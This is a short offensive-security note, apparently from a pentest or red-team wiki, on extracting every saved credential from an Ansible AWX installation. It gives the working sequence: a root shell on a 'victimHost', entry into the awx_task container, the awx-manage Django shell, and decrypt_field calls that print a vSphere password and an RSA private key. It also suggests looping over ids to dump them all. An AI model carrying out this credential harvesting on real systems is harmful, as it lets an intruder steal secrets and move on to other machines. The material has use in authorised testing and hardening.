Ansible AWX

Ansible AWX is the open-source equivalent of the commercial Ansible Tower. AWX provides a web-based user interface, REST API, and task engine built on top of Ansible. It is one of the upstream projects for Red Hat Ansible Automation Platform.

Ansible AWX installations come with three default Docker containers, one container for the web interface, one container for its database, and one container for performing tasks also known as Jobs.

One of it's features is 'Credentials' which allows administrators to store credentials, private keys and other sensitive information to be utilized by Ansible AWX for authentication when launching Jobs against other machines.

Ansible AWX uses SSH to connect to remote hosts (or the Windows equivalent) and no matter what type of secret (private key, password, etc.) is used, the secret needs to be decrypted before connecting to the remote host. This decrypt function can be used maliciously to harvest all saved credentials in plaintext.

[root@victimHost ~]# docker exec -it awx_task /bin/bash
bash-4.4# awx-manage shell_plus
>>> from awx.main.utils import decrypt_field
>>> creds = Credential.objects.get(name="vSphere-01")
>>> print(decrypt_field(creds, "password"))
H************************

>>> creds = Credential.objects.get(name="admin-id_rsa")
>>> print(decrypt_field(creds, "ssh_key_data"))
-----BEGIN RSA PRIVATE KEY-----
M************************

Note: the Credential.objects.get parameter name is referring to the column name. This could instead be changed to something more iterable like id for looping through and decrypting all saved credentials.